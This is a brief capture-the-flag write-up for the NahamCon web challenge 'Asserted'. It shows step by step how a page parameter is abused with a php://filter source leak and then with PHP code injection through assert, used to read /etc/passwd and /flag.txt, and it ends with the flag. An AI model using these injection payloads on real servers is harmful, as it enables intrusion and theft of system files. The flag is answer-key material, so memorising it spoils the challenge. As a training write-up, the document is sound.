Tags: web
Rating: 5.0
# Asserted
## Trying things
After a while a noticed that the url was using an argument to change between pages:
```
http://challenge.nahamcon.com:32302/index.php?page=about
```
If i try something like:
```
http://challenge.nahamcon.com:32302/index.php?page=../
```
The page returns: `HACKING DETECTED! PLEASE STOP THE HACKING PRETTY PLEASE`
## Digging
I wanted to check the php code of this `index.php` so i researched a bit and i used this:
```
http://challenge.nahamcon.com:32302/index.php?page=php://filter/convert.base64-encode/resource=index
```
To get a base64 encoded `index.php` file. After decoding we can take a look to this friend:
```
```
Looks like that `assert` function can be abused. Lets try this simple payload:
```
http://challenge.nahamcon.com:30611/index.php?page='. die("HALLO") .'
```
The page printed `HALLO` to the response body so lets try LFI:
```
http://challenge.nahamcon.com:30611/index.php?page='. die(file_get_contents("/etc/passwd")) .'
```
And the server printed the hole file to us, cool. Lets find and get the flag then:
```
http://challenge.nahamcon.com:30611/index.php?page='. die(file_get_contents("/flag.txt")) .'
```
Flag: `flag{85a25711fa6e111ed54b86468a45b90c}`
